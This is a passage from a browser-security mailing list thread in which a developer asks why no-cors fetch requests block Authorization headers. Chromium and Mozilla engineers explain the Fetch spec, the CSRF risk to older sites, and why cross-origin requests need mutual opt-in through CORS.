Why does "no-cors" disallow Authorization Headers

11 views
Skip to first unread message

Jeremy Lewi

unread,
Mar 10, 2023, 1:21:48 PM3/10/23
to site-isol...@chromium.org
Hi Folks,

I was hoping someone here might be willing to explain the threat model that blocking most headers when CORS is disabled is guarding against. This seems to be a blocker for a wide range of useful webapps like postman on the web. Why can't chromium allow a client app to disable CORS while still being able to set an Authorization header with a credential the client app obtained (e.g. via an OAuth flow)? Concretely, I'd like to create a webapp that obtains GCP, GitHub, or other API credentials and then accesses those APIs. As far as I can tell some of these APIs don't support CORS OPTIONS preflights (I get 400s).

IUC, CORS is needed because by default the browser attaches any cookies for a site when making requests to that site even if the client app doesn't have access to the cookie. So disabling this behavior is necessary when running without CORS. However, blocking client apps from sending validly obtained credentials seems like an overreach and blocks any API which doesn't implement CORS (which anecdotally seems like quite a lot).

I thought browsers had pretty good sandboxing for JS apps. So my expectation would be that if I trust https://acme.co, I should be fine going through an OAuth flow and granting it an access token to access APIs on my behalf. I can get around CORS by delivering the same application as a native application but I don't see what added security it buy. On the other hand it does add considerable friction compared to just opening a site in the browser.

Best,
J



Łukasz Anforowicz

unread,
Mar 10, 2023, 1:43:42 PM3/10/23
to Jeremy Lewi, site-isol...@chromium.org, securi...@chromium.org
<+securi...@chromium.org which is a slightly broader discussion list>

The short (and even if technically correct maybe not so helpful) answer is that handling of HTTP headers in no-cors requests follows the behavior prescribed in the spec: https://fetch.spec.whatwg.org/#no-cors-safelisted-request-header.  I tried to look at `git blame` on https://github.com/whatwg/fetch/blame/main/fetch.bs but couldn't find a clear rationale for this.  So, I think I can only speculate why the spec is written this way:
  • CORS is required for POST requests and custom headers may be seen as a variant of this (i.e. another scenario that doesn't use plain-vanilla HTTP requests of a regular <img> tag).
  • Some XSRF protection techniques rely on disallowing custom headers in no-cors requests

Jeremy Lewi

unread,
Mar 10, 2023, 9:51:21 PM3/10/23
to Łukasz Anforowicz, site-isol...@chromium.org, securi...@chromium.org
Appreciate the quick response. I'm still unclear whether its this way because there's no secure way to support cross origin requests without requiring servers to implement CORS  or because no one has bothered to invest in a mechanism suitable for modern web apps. Given the amount of energy invested in dealing with CORS (e.g. via proxies) it seems unlikely there hasn't been robust discussion about possible alternatives. 

Jeremy Lewi

unread,
Mar 14, 2023, 11:02:30 AM3/14/23
to Daniel Veditz, site-isol...@chromium.org, securi...@chromium.org
Hi Dan,

This really clarifies things. Thank you very much.

For posterity, I'll just one other document which I found really helpful

J

On Mon, Mar 13, 2023 at 5:41 PM Daniel Veditz <dve...@mozilla.com> wrote:
On Mon, Mar 13, 2023 at 2:05 AM Jeremy Lewi <jer...@lewi.us> wrote:
Appreciate the quick response. I'm still unclear whether its this way because there's no secure way to support cross origin requests without requiring servers to implement CORS  or because no one has bothered to invest in a mechanism suitable for modern web apps.

We have found no secure way to support cross-origin HTTP requests without some form of mutual opt-in. Lots of things could be "secure enough" for many sites, but there's no end to sites running code making really old assumptions about what a web page can do. In particular, the browser can't know when a URL request is public or not until it gets the answer, at which point it could be too late and some kind of CSRF has just happened. Cookies are an obvious clue that the request might be part of a stateful transaction, but the absence of cookies doesn't mean it's not: the authorization might be buried in the URL itself or in some added headers. New features shouldn't create security problems for old sites. It's not fair to the authors of those sites and it's dangerous for the users of those sites. It's frustrating to everyone because there are sites where "obviously" it would be safe and beneficial to allow use of the data. The problem is it's not obvious to the browser, which has no brain that can distinguish safe sites from problematic ones.

CORS is not getting in your way of communicating; CORS is allowing a whole lot of communication that was never possible before CORS was invented.

Most of these restrictions are because browsers don't know what the user wants or expects. Instead of the two origins mutually opting in through CORS you could imagine a user setting for "I trust prettycharts.com to talk to censusdata.org on my behalf" and then allowing any connection at all. We haven't figured out a way to expose that to users that they'd understand, and we're afraid of the annoyance and abuse we'd unleash if we allowed sites to request it (if you thought constant geolocation requests were bad...). But Web Extensions, that users explicitly install, can make these kinds of unfettered requests, bounded by the permissions the user granted.

The CORS FAQ captures some of the early thinking on this: https://www.w3.org/wiki/CORS
You can find the raw historical discussions on the whatwg mailing list archive

-Dan Veditz
Reply all
Reply to author
Forward
0 new messages